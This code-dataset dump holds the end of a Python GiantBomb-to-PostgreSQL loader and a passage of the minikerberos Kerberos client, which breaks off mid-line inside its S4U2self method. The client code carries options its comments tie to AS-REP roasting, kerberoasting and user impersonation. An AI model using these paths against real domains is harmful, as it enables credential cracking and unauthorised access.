giantbombid: (int) id of game\n :return: None\n \"\"\"\n\n if giantbombid == 0:\n giantbombid = self.search_mismatch(name)\n\n data = 
[item[0] for item in self.db_ids if giantbombid in item]\n\n if not data:\n api = self.search_web(name, giantbombid)\n\n if api:\n self.add_db(api, name)\n else:\n self.add_db_no_api(name, giantbombid)\n print('added ' + name + ' to giantbomb table')\n\n @staticmethod\n def add_db_no_api(name, giantbombid):\n \"\"\"db call for no api\n\n :param name: (str) name of game\n :param giantbombid: (int) id of game\n :return: None\n \"\"\"\n conn = connect()\n cur = conn.cursor()\n\n query = '''INSERT INTO giantbomb VALUES (%(giantbombid)s, %(name)s) '''\n cur.execute(query, dict(giantbombid=giantbombid, name=name))\n\n conn.commit()\n conn.close()\n\n def add_db(self, api, name):\n \"\"\" db add with api call\n\n :param api: (str) api url\n :param name: (str) name of game\n :return: None\n \"\"\"\n\n headers = {'user-agent': 'DataIncubatorProjectBot'}\n fields = requests.get(api, params=dict(format='json', api_key=self.token), headers=headers).json()\n row = fields['results']\n\n data = dict(\n name=name,\n giantbombid=row['id'],\n alias=row['aliases'],\n api=row['api_detail_url'],\n release=row['original_release_date'],\n deck=row['deck']\n )\n\n conn = connect()\n cur = conn.cursor()\n\n # looping through tablenames to populate tables\n for tablename in self.tablenames:\n self.add_resource(data['giantbombid'], tablename, row, cur)\n\n # final query to giantbomb table\n query = '''\n INSERT INTO giantbomb VALUES (\n %(giantbombid)s,\n %(name)s,\n %(alias)s,\n %(api)s,\n %(release)s,\n %(deck)s\n )\n '''\n\n cur.execute(query, data)\n conn.commit()\n conn.close()\n\n @staticmethod\n def add_resource(giantbombid, table_name, row, cur):\n \"\"\"adds info to each table\n\n :param giantbombid: (int) id of game\n :param table_name: (str) name of table\n :param row: (json) json of api call\n :param cur: (object) cursor for sql connection\n :return: None\n :rtype: object\n \"\"\"\n\n # check if resource exists\n if row.get(table_name[0]) is None:\n return\n\n elif row[table_name[0]] is None:\n return\n\n else:\n data = dict(giantbombid=AsIs(giantbombid),\n tablename=AsIs(table_name[1]),\n tablebombname=AsIs(table_name[1] + 'bomb')\n )\n\n for item in row[table_name[0]]:\n data['name'] = item['name']\n data['id'] = item['id']\n\n # adding to resourcebomb table\n query = '''\n INSERT INTO %(tablebombname)s VALUES(DEFAULT, %(id)s, %(giantbombid)s)\n '''\n cur.execute(query, data)\n\n # adding to resource table, checking for uniqueness\n query = '''\n DO\n $do$\n BEGIN\n IF NOT EXISTS(SELECT * FROM %(tablename)s WHERE %(tablename)s = %(name)s) THEN\n INSERT INTO %(tablename)s VALUES(%(id)s, %(name)s);\n END IF;\n END\n $do$\n '''\n cur.execute(query, data)\n\n return\n","sub_path":"db_connect.py","file_name":"db_connect.py","file_ext":"py","file_size_in_byte":12295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"562559756","text":"import collections\nimport datetime\nimport secrets\nfrom typing import List, Dict\nfrom unicrypto import hashlib\n\nfrom minikerberos import logger\nfrom minikerberos.common.ccache import CCACHE\nfrom minikerberos.network.clientsocket import KerberosClientSocket\nfrom minikerberos.protocol.asn1_structs import METHOD_DATA, ETYPE_INFO, ETYPE_INFO2, \\\n\tPADATA_TYPE, PA_PAC_REQUEST, PA_ENC_TS_ENC, EncryptedData, krb5_pvno, KDC_REQ_BODY, \\\n\tAS_REQ, TGS_REP, KDCOptions, PrincipalName, EncASRepPart, EncTGSRepPart, PrincipalName, Realm, \\\n\tChecksum, APOptions, Authenticator, Ticket, AP_REQ, TGS_REQ, CKSUMTYPE, 
\\\n\tPA_FOR_USER_ENC, PA_PAC_OPTIONS, PA_PAC_OPTIONSTypes, EncTicketPart\n\nfrom minikerberos.protocol.errors import KerberosErrorCode, KerberosError\nfrom minikerberos.protocol.encryption import Key, _enctype_table, _HMACMD5, Enctype\nfrom minikerberos.protocol.constants import PaDataType, EncryptionType, NAME_TYPE, MESSAGE_TYPE\nfrom minikerberos.protocol.structures import AuthenticatorChecksum\nfrom minikerberos.protocol.rfc4556 import PKAuthenticator, AuthPack, PA_PK_AS_REP, KDCDHKeyInfo, PA_PK_AS_REQ\nfrom minikerberos.common.creds import KerberosCredential\nfrom minikerberos.common.target import KerberosTarget\nfrom minikerberos.common.spn import KerberosSPN\nfrom minikerberos.protocol.ticketutils import construct_apreq_from_tgs_tgt\n\n\nfrom asn1crypto import cms\nfrom asn1crypto import core\n\nclass KerbrosClient:\n\tdef __init__(self, ccred:KerberosCredential, target:KerberosTarget):\n\t\tself.credential = ccred\n\t\tself.target = target\n\t\tself.ksoc = KerberosClientSocket(self.target)\n\t\tself.ccache = CCACHE() if ccred.ccache is None else ccred.ccache\n\t\tself.kerberos_session_key = None\n\t\tself.kerberos_TGT = None\n\t\tself.kerberos_TGT_encpart = None\n\t\tself.kerberos_TGS = None\n\t\tself.kerberos_cipher = None\n\t\tself.kerberos_cipher_type = None\n\t\tself.kerberos_key = None\n\t\tself.server_salt = None\n\t\tself.pkinit_tkey = None\n\n\tdef build_asreq_lts(self, supported_encryption_method, kdcopts:List[str] = ['forwardable','renewable','proxiable'], enctimestamp=None, newnow=None, no_preauth = False, kdc_req_body_extra = None, with_pac:bool = True) -> AS_REQ:\n\t\tlogger.debug('Constructing TGT request with auth data')\n\t\t#now to create an AS_REQ with encrypted timestamp for authentication\n\t\tpadatas = []\n\t\t\n\t\tif with_pac is True:\n\t\t\tpa_data_1 = {}\n\t\t\tpa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))\n\t\t\tpa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()\n\t\t\tpadatas.append(pa_data_1)\n\t\t\n\t\tlogger.debug('Selecting common encryption type: %s' % supported_encryption_method.name)\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\t\tif no_preauth is False:\n\t\t\tif enctimestamp is None:\n\t\t\t\t#creating timestamp asn1\n\t\t\t\ttimestamp = PA_ENC_TS_ENC({'patimestamp': now.replace(microsecond=0), 'pausec': now.microsecond}).dump()\n\t\t\t\tself.kerberos_cipher = _enctype_table[supported_encryption_method.value]\n\t\t\t\tself.kerberos_cipher_type = supported_encryption_method.value\n\t\t\t\tself.kerberos_key = Key(self.kerberos_cipher.enctype, self.credential.get_key_for_enctype(supported_encryption_method, salt = self.server_salt))\n\t\t\t\tenc_timestamp = self.kerberos_cipher.encrypt(self.kerberos_key, 1, timestamp, None)\n\t\t\telse:\n\t\t\t\tnow = newnow\n\t\t\t\tenc_timestamp = enctimestamp\n\t\t\t\n\t\t\tpa_data_2 = {}\n\t\t\tpa_data_2['padata-type'] = int(PADATA_TYPE('ENC-TIMESTAMP'))\n\t\t\tpa_data_2['padata-value'] = EncryptedData({'etype': supported_encryption_method.value, 'cipher': enc_timestamp}).dump()\n\t\t\tpadatas.append(pa_data_2)\n\n\t\tkdc_req_body = {}\n\t\tkdc_req_body['kdc-options'] = KDCOptions(set(kdcopts))\n\t\tkdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': self.credential.username.split('/')})\n\t\tkdc_req_body['realm'] = self.credential.domain.upper()\n\t\tkdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.credential.domain.upper()]})\n\t\tkdc_req_body['till'] = (now 
+ datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body['rtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body['nonce'] = secrets.randbits(31)\n\t\tkdc_req_body['etype'] = [supported_encryption_method.value] #selecting according to server's preferences\n\t\t\n\t\tif kdc_req_body_extra is not None:\n\t\t\tfor key in kdc_req_body_extra:\n\t\t\t\tkdc_req_body[key] = kdc_req_body_extra[key]\n\t\t\n\t\tkdc_req = {}\n\t\tkdc_req['pvno'] = krb5_pvno\n\t\tkdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value\n\t\tkdc_req['padata'] = padatas\n\t\tkdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)\n\t\t\n\t\treturn AS_REQ(kdc_req)\n\t\n\tdef build_asreq_pkinit(self, supported_encryption_method, kdcopts = ['forwardable','renewable','renewable-ok'], with_pac:bool = True) -> AS_REQ:\n\t\tfrom asn1crypto import keys\n\n\t\tif supported_encryption_method.value == 23:\n\t\t\traise Exception('RC4 encryption is not supported for certificate auth!')\n\n\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\n\t\tkdc_req_body_data = {}\n\t\tkdc_req_body_data['kdc-options'] = KDCOptions(set(kdcopts))\n\t\tkdc_req_body_data['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': self.credential.username.split('/')})\n\t\tkdc_req_body_data['realm'] = self.credential.domain.upper()\n\t\tkdc_req_body_data['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': ['krbtgt', self.credential.domain.upper()]})\n\t\tkdc_req_body_data['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body_data['rtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body_data['nonce'] = secrets.randbits(31)\n\t\tkdc_req_body_data['etype'] = [supported_encryption_method.value] #[18,17] # 23 breaks...\n\t\tkdc_req_body = KDC_REQ_BODY(kdc_req_body_data)\n\n\n\t\tchecksum = hashlib.sha1(kdc_req_body.dump()).digest()\n\n\t\tauthenticator = {}\n\t\tauthenticator['cusec'] = now.microsecond\n\t\tauthenticator['ctime'] = now.replace(microsecond=0)\n\t\tauthenticator['nonce'] = secrets.randbits(31)\n\t\tauthenticator['paChecksum'] = checksum\n\n\n\t\tdp = {}\n\t\tdp['p'] = self.credential.dhparams.p\n\t\tdp['g'] = self.credential.dhparams.g\n\t\tdp['q'] = 0 # mandatory parameter, but it is not needed\n\n\t\tpka = {}\n\t\tpka['algorithm'] = '1.2.840.10046.2.1'\n\t\tpka['parameters'] = keys.DomainParameters(dp)\n\n\t\tspki = {}\n\t\tspki['algorithm'] = keys.PublicKeyAlgorithm(pka)\n\t\tspki['public_key'] = self.credential.dhparams.get_public_key()\n\n\n\t\tauthpack = {}\n\t\tauthpack['pkAuthenticator'] = PKAuthenticator(authenticator)\n\t\tauthpack['clientPublicValue'] = keys.PublicKeyInfo(spki)\n\t\tauthpack['clientDHNonce'] = self.credential.dhparams.dh_nonce\n\n\t\tauthpack = AuthPack(authpack)\n\t\tsigned_authpack = self.credential.sign_authpack(authpack.dump(), wrap_signed = True)\n\n\t\tpayload = PA_PK_AS_REQ()\n\t\tpayload['signedAuthPack'] = signed_authpack\n\n\t\tpadatas = []\n\t\tif with_pac is True:\n\t\t\tpa_data_0 = {}\n\t\t\tpa_data_0['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))\n\t\t\tpa_data_0['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()\n\t\t\tpadatas.append(pa_data_0)\n\t\t\n\t\tpa_data_1 = {}\n\t\tpa_data_1['padata-type'] = PaDataType.PK_AS_REQ.value\n\t\tpa_data_1['padata-value'] = payload.dump()\n\t\tpadatas.append(pa_data_1)\n\n\t\tasreq = {}\n\t\tasreq['pvno'] = 5\n\t\tasreq['msg-type'] = 10\n\t\tasreq['padata'] = padatas\n\t\tasreq['req-body'] = 
kdc_req_body\n\n\t\treturn AS_REQ(asreq)\n\n\tdef do_preauth(self, supported_encryption_method, kdcopts = ['forwardable','renewable','renewable-ok'], with_pac:bool = True):\n\t\tif self.credential.certificate is not None:\n\t\t\treq = self.build_asreq_pkinit(supported_encryption_method, kdcopts, with_pac=with_pac)\n\t\telse:\n\t\t\treq = self.build_asreq_lts(supported_encryption_method, kdcopts, with_pac=with_pac)\n\n\t\t\n\t\tlogger.debug('Sending TGT request to server')\n\t\trep = self.ksoc.sendrecv(req.dump())\n\t\tif rep.name == 'KRB_ERROR':\n\t\t\traise KerberosError(rep, 'Preauth failed!')\n\t\treturn rep\n\n\tdef tgt_from_ccache(self):\n\t\ttry:\n\t\t\tif self.ccache is None:\n\t\t\t\traise Exception('No CCACHE file found')\n\t\t\t\n\t\t\ttgt, keystruct, err = self.ccache.get_tgt(self.credential.username, self.credential.domain, self.credential.ccache_spn_strict_check)\n\t\t\tif err is not None:\n\t\t\t\traise err\n\t\t\tself.kerberos_TGT = tgt\n\t\t\tself.kerberos_TGT_encpart = tgt['enc-part']\n\t\t\tself.kerberos_session_key = Key(keystruct['keytype'], keystruct['keyvalue'])\n\t\t\tself.kerberos_cipher = _enctype_table[keystruct['keytype']]\n\t\t\tself.kerberos_cipher_type = keystruct['keytype']\n\t\t\treturn True, None\n\t\texcept Exception as e:\n\t\t\treturn None, e\n\t\n\tdef select_preferred_encryption_method(self, rep):\n\t\t#now getting server's supported encryption methods\n\t\t\n\t\tsupp_enc_methods = collections.OrderedDict()\n\t\tfor enc_method in METHOD_DATA.load(rep['e-data']).native:\n\t\t\tdata_type = PaDataType(enc_method['padata-type'])\n\t\t\t\n\t\t\tif data_type == PaDataType.ETYPE_INFO or data_type == PaDataType.ETYPE_INFO2:\n\t\t\t\tif data_type == PaDataType.ETYPE_INFO:\n\t\t\t\t\tenc_info_list = ETYPE_INFO.load(enc_method['padata-value'])\n\t\t\t\t\t\n\t\t\t\telif data_type == PaDataType.ETYPE_INFO2:\n\t\t\t\t\tenc_info_list = ETYPE_INFO2.load(enc_method['padata-value'])\n\t\t\n\t\t\t\tfor enc_info in enc_info_list.native:\n\t\t\t\t\tsupp_enc_methods[EncryptionType(enc_info['etype'])] = enc_info['salt']\n\t\t\t\t\tlogger.debug('Server supports encryption type %s with salt %s' % (EncryptionType(enc_info['etype']).name, enc_info['salt']))\n\t\t\n\t\tpreferred_enc_type = self.credential.get_preferred_enctype(supp_enc_methods)\n\t\tif preferred_enc_type not in supp_enc_methods:\n\t\t\traise Exception('Preferred enc type not in supported enctypes')\n\t\tsalt = supp_enc_methods[preferred_enc_type]\n\t\tif salt is not None:\n\t\t\tsalt = salt.encode()\n\t\tself.server_salt = salt #enc_info['salt'].encode()\n\t\treturn preferred_enc_type\n\n\tdef get_TGT(self, override_etype = None, decrypt_tgt = True, kdcopts = ['forwardable','renewable','proxiable'], override_sname:KerberosSPN = None, with_pac:bool = True):\n\t\t\"\"\"\n\t\tdecrypt_tgt: used for asreproast attacks\n\t\tSteps performed:\n\t\t\t1. Send an empty (no encrypted timestamp) AS_REQ with all the encryption types we support\n\t\t\t2. Depending on the response (either error or AS_REP with TGT) we either send another AS_REQ with the encrypted data or return the TGT (or fail miserably)\n\t\t\t3. 
PROFIT\n\t\t\"\"\"\n\n\t\t#first, let's check if CCACHE has the correct ticket already\n\t\t_, err = self.tgt_from_ccache()\n\t\tif err is None:\n\t\t\treturn\n\t\t\n\t\tlogger.debug('Generating initial TGT without authentication data')\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\t\tkdc_req_body = {}\n\t\tkdc_req_body['kdc-options'] = KDCOptions(set(kdcopts))\n\t\tkdc_req_body['cname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': self.credential.username.split('/')})\n\t\tkdc_req_body['realm'] = self.credential.domain.upper()\n\t\tif override_sname is None:\n\t\t\tkdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': ['krbtgt', self.credential.domain.upper()]})\n\t\telse:\n\t\t\t# if we want to directly kerberoast with no-preauth user\n\t\t\tkdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': override_sname.get_principalname()})\n\t\tkdc_req_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body['rtime'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body['nonce'] = secrets.randbits(31)\n\t\tif override_etype is None:\n\t\t\tkdc_req_body['etype'] = self.credential.get_supported_enctypes()\n\t\telse:\n\t\t\tkdc_req_body['etype'] = override_etype\n\n\t\tpa_data_1 = {}\n\t\tif with_pac is True:\n\t\t\tpa_data_1['padata-type'] = int(PADATA_TYPE('PA-PAC-REQUEST'))\n\t\t\tpa_data_1['padata-value'] = PA_PAC_REQUEST({'include-pac': True}).dump()\n\t\t\n\t\tkdc_req = {}\n\t\tkdc_req['pvno'] = krb5_pvno\n\t\tkdc_req['msg-type'] = MESSAGE_TYPE.KRB_AS_REQ.value\n\t\tif len(pa_data_1) > 0:\n\t\t\tkdc_req['padata'] = [pa_data_1]\n\t\tkdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)\n\t\t\n\t\treq = AS_REQ(kdc_req)\t\n\t\t\n\t\tlogger.debug('Sending initial TGT to %s' % self.ksoc.get_addr_str())\n\t\trep = self.ksoc.sendrecv(req.dump(), throw = False)\n\n\t\tif rep.name != 'KRB_ERROR':\n\t\t\t#user can do kerberos auth without preauthentication!\n\t\t\trep = rep.native\n\t\t\tself.kerberos_TGT = rep\n\n\t\t\t#if we want to roast the asrep (tgt rep) part then we dont even have the proper keys to decrypt\n\t\t\t#so we just return, the asrep can be extracted from this object anyhow\n\t\t\tif decrypt_tgt == False or self.credential.nopreauth is True:\n\t\t\t\treturn rep\n\n\t\t\tself.kerberos_cipher = _enctype_table[rep['enc-part']['etype']]\n\t\t\tself.kerberos_cipher_type = rep['enc-part']['etype']\n\t\t\tself.kerberos_key = Key(self.kerberos_cipher.enctype, self.credential.get_key_for_enctype(EncryptionType(rep['enc-part']['etype'])))\n\t\t\t\n\t\telse:\n\t\t\tif rep.native['error-code'] != KerberosErrorCode.KDC_ERR_PREAUTH_REQUIRED.value:\n\t\t\t\traise KerberosError(rep)\n\t\t\trep = rep.native\n\t\t\tlogger.debug('Got reply from server, asikg to provide auth data')\n\t\t\tsupported_encryption_method = self.select_preferred_encryption_method(rep)\n\n\t\t\trep = self.do_preauth(supported_encryption_method)\n\t\t\tlogger.debug('Got valid TGT response from server')\n\t\t\trep = rep.native\n\t\t\tself.kerberos_TGT = rep\n\n\t\tif self.credential.certificate is not None:\n\t\t\tself.kerberos_TGT_encpart, self.kerberos_session_key, self.kerberos_cipher = self.decrypt_asrep_cert(rep)\n\t\t\tself.kerberos_cipher_type = supported_encryption_method.value\n\n\t\t\tself.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)\n\t\t\tlogger.debug('Got valid TGT')\n\t\t\treturn \n\t\t\n\t\telse:\n\t\t\tcipherText 
= rep['enc-part']['cipher']\n\t\t\ttemp = self.kerberos_cipher.decrypt(self.kerberos_key, 3, cipherText)\n\t\t\ttry:\n\t\t\t\tself.kerberos_TGT_encpart = EncASRepPart.load(temp).native\n\t\t\texcept Exception as e:\n\t\t\t\tlogger.debug('EncAsRepPart load failed, is this linux?')\n\t\t\t\ttry:\n\t\t\t\t\tself.kerberos_TGT_encpart = EncTGSRepPart.load(temp).native\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tlogger.error('Failed to load decrypted part of the reply!')\n\t\t\t\t\traise e\n\t\t\t\n\t\t\tself.kerberos_session_key = Key(self.kerberos_cipher.enctype, self.kerberos_TGT_encpart['key']['keyvalue'])\n\t\t\tself.ccache.add_tgt(self.kerberos_TGT, self.kerberos_TGT_encpart, override_pp = True)\n\t\t\tlogger.debug('Got valid TGT')\n\t\t\t\n\t\t\treturn \n\t\n\tdef tgs_from_ccache(self, spn_user:KerberosSPN):\n\t\ttry:\n\t\t\tif self.ccache is None:\n\t\t\t\traise Exception('No CCACHE file found')\n\t\t\t\n\t\t\ttgs, keystruct, err = self.ccache.get_tgs(spn_user)\n\t\t\tif err is not None:\n\t\t\t\traise err\n\t\t\t\n\t\t\tkey = Key(keystruct['keytype'], keystruct['keyvalue'])\n\t\t\ttgs = TGS_REP(tgs).native\n\t\t\treturn tgs, tgs['enc-part'], key, None\n\t\texcept Exception as e:\n\t\t\treturn None, None, None, e\n\t\t\n\tdef get_TGS(self, spn_user, override_etype = None, is_linux = False):\n\t\t\"\"\"\n\t\tRequests a TGS ticket for the specified user.\n\t\tReturns the TGS ticket and the decrypted encTGSRepPart.\n\n\t\tspn_user: KerberosTarget: the service user you want to get TGS for.\n\t\toverride_etype: None or list of etype values (int) Used mostly for kerberoasting, will override the AP_REQ supported etype values (which is derived from the TGT) to be able to receive whatever TGS ticket \n\t\t\"\"\"\n\t\t\n\t\t#first, let's check if CCACHE has the correct ticket already\n\t\ttgs, encTGSRepPart, key, err = self.tgs_from_ccache(spn_user)\n\t\tif err is None:\n\t\t\treturn tgs, encTGSRepPart, key\n\n\t\t\n\t\tif self.kerberos_TGT is None:\n\t\t\t#let's check if CCACHE has a TGT for us\n\t\t\t_, err = self.tgt_from_ccache()\n\t\t\tif err is not None:\n\t\t\t\traise Exception('No TGT found in CCACHE!')\n\n\t\t#nope, we need to contact the server\n\t\tlogger.debug('Constructing TGS request for user %s' % spn_user.get_formatted_pname())\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\t\tkdc_req_body = {}\n\t\tkdc_req_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','renewable_ok', 'canonicalize']))\n\t\tkdc_req_body['realm'] = spn_user.domain.upper()\n\t\tkdc_req_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})\n\t\tkdc_req_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkdc_req_body['nonce'] = secrets.randbits(31)\n\t\tif override_etype:\n\t\t\tkdc_req_body['etype'] = override_etype\n\t\telse:\n\t\t\tif self.kerberos_cipher_type == -128:\n\t\t\t\t# we dunno how to do GSS api calls with -128 etype,\n\t\t\t\t# but we can request etype 23 here for which all is implemented\n\t\t\t\tkdc_req_body['etype'] = [23]\n\t\t\telse:\n\t\t\t\tkdc_req_body['etype'] = [self.kerberos_cipher_type]\n\n\t\tauthenticator_data = {}\n\t\tauthenticator_data['authenticator-vno'] = krb5_pvno\n\t\tauthenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])\n\t\tauthenticator_data['cname'] = self.kerberos_TGT['cname']\n\t\tauthenticator_data['cusec'] = now.microsecond\n\t\tauthenticator_data['ctime'] = now.replace(microsecond=0)\n\t\t\n\t\tif is_linux:\n\t\t\tac = 
AuthenticatorChecksum()\n\t\t\tac.flags = 0\n\t\t\tac.channel_binding = b'\\x00'*16\n\t\t\t\n\t\t\tchksum = {}\n\t\t\tchksum['cksumtype'] = 0x8003\n\t\t\tchksum['checksum'] = ac.to_bytes()\n\n\n\t\t\tauthenticator_data['cksum'] = Checksum(chksum)\n\t\t\tauthenticator_data['seq-number'] = 0\n\t\t\n\t\tauthenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)\n\t\t\n\t\tap_req = {}\n\t\tap_req['pvno'] = krb5_pvno\n\t\tap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value\n\t\tap_req['ap-options'] = APOptions(set())\n\t\tap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])\n\t\tap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})\n\t\t\n\t\tpa_data_1 = {}\n\t\tpa_data_1['padata-type'] = PaDataType.TGS_REQ.value\n\t\tpa_data_1['padata-value'] = AP_REQ(ap_req).dump()\n\t\t\n\t\t\n\t\tkdc_req = {}\n\t\tkdc_req['pvno'] = krb5_pvno\n\t\tkdc_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value\n\t\tkdc_req['padata'] = [pa_data_1]\n\t\tkdc_req['req-body'] = KDC_REQ_BODY(kdc_req_body)\n\t\t\n\t\treq = TGS_REQ(kdc_req)\n\t\tlogger.debug('Constructing TGS request to server')\n\t\trep = self.ksoc.sendrecv(req.dump())\n\t\tif rep.name == 'KRB_ERROR':\n\t\t\traise KerberosError(rep, 'get_TGS failed!')\n\t\tlogger.debug('Got TGS reply, decrypting...')\n\t\ttgs = rep.native\n\t\t\n\t\tencTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native\n\t\tkey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])\n\t\t\n\t\tself.ccache.add_tgs(tgs, encTGSRepPart)\n\t\tlogger.debug('Got valid TGS reply')\n\t\tself.kerberos_TGS = tgs\n\t\treturn tgs, encTGSRepPart, key\n\n\tdef U2U(self, kdcopts = ['forwardable','renewable','canonicalize', 'enc-tkt-in-skey'], supp_enc_methods = [EncryptionType.DES_CBC_CRC,EncryptionType.DES_CBC_MD4,EncryptionType.DES_CBC_MD5,EncryptionType.DES3_CBC_SHA1,EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):\n\t\tif not self.kerberos_TGT:\n\t\t\tlogger.debug('[U2U] TGT is not available! 
Fetching TGT...')\n\t\t\tself.get_TGT()\n\n\t\tsupp_enc = self.credential.get_preferred_enctype(supp_enc_methods)\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\t\tauthenticator_data = {}\n\t\tauthenticator_data['authenticator-vno'] = krb5_pvno\n\t\tauthenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])\n\t\tauthenticator_data['cname'] = self.kerberos_TGT['cname']\n\t\tauthenticator_data['cusec'] = now.microsecond\n\t\tauthenticator_data['ctime'] = now.replace(microsecond=0)\n\n\n\t\tauthenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)\n\n\t\tap_req = {}\n\t\tap_req['pvno'] = krb5_pvno\n\t\tap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value\n\t\tap_req['ap-options'] = APOptions(set())\n\t\tap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])\n\t\tap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})\n\n\t\tpa_data_auth = {}\n\t\tpa_data_auth['padata-type'] = PaDataType.TGS_REQ.value\n\t\tpa_data_auth['padata-value'] = AP_REQ(ap_req).dump()\n\n\t\t\n\t\tkrb_tgs_body = {}\n\t\tkrb_tgs_body['kdc-options'] = KDCOptions(set(kdcopts))\n\t\tkrb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': self.credential.username.split('/')})\n\t\tkrb_tgs_body['realm'] = self.credential.domain.upper()\n\t\tkrb_tgs_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkrb_tgs_body['nonce'] = secrets.randbits(31)\n\t\tkrb_tgs_body['etype'] = [23] # dunno why it must be 23?\n\t\tkrb_tgs_body['additional-tickets'] = [Ticket(self.kerberos_TGT['ticket'])]\n\t\t\n\t\t\n\t\tkrb_tgs_req = {}\n\t\tkrb_tgs_req['pvno'] = krb5_pvno\n\t\tkrb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value\n\t\tkrb_tgs_req['padata'] = [pa_data_auth] #pa_for_user\n\t\tkrb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)\n\t\t\n\t\t\n\t\t\n\t\treq = TGS_REQ(krb_tgs_req)\n\t\tlogger.debug('[U2U] Sending request to server')\n\t\t\n\t\treply = self.ksoc.sendrecv(req.dump())\n\t\tif reply.name == 'KRB_ERROR':\n\t\t\temsg = '[U2U] failed!'\n\t\t\tif reply.native['error-code'] == 16:\n\t\t\t\temsg = '[U2U] Failed to get U2U! 
Error code (16) indicates that delegation is not enabled for this account!'\t\t\t\n\t\t\traise KerberosError(reply, emsg)\n\t\t\n\t\tlogger.debug('[U2U] Got reply, decrypting...')\n\t\ttgs = reply.native\n\n\t\tcipher = _enctype_table[int(tgs['ticket']['enc-part']['etype'])]\n\t\tencticket = tgs['ticket']['enc-part']['cipher']\n\t\tdecdata = cipher.decrypt(self.kerberos_session_key, 2, encticket)\n\t\tdecticket = EncTicketPart.load(decdata).native\n\n\t\tencTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native\n\t\tkey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])\n\t\tself.ccache.add_tgs(tgs, encTGSRepPart)\n\t\tlogger.debug('[U2U] Got valid TGS reply')\n\n\t\treturn tgs, encTGSRepPart, key, decticket\n\n\t\n\t#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/6a8dfc0c-2d32-478a-929f-5f9b1b18a169\n\tdef S4U2self(self, user_to_impersonate, spn_user = None, kdcopts = ['forwardable','renewable','canonicalize'], supp_enc_methods = [EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):\n\t\t\"\"\"\n\t\tuser_to_impersonate : KerberosTarget class\n\t\t\"\"\"\t\t\n\t\tif not self.kerberos_TGT:\n\t\t\tlogger.debug('[S4U2self] TGT is not available! Fetching TGT...')\n\t\t\tself.get_TGT()\n\t\t\n\t\tsupp_enc = self.credential.get_preferred_enctype(supp_enc_methods)\n\t\tauth_package_name = 'Kerberos'\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\t\t\n\t\t\n\t\t###### Calculating authenticator data\n\t\tauthenticator_data = {}\n\t\tauthenticator_data['authenticator-vno'] = krb5_pvno\n\t\tauthenticator_data['crealm'] = 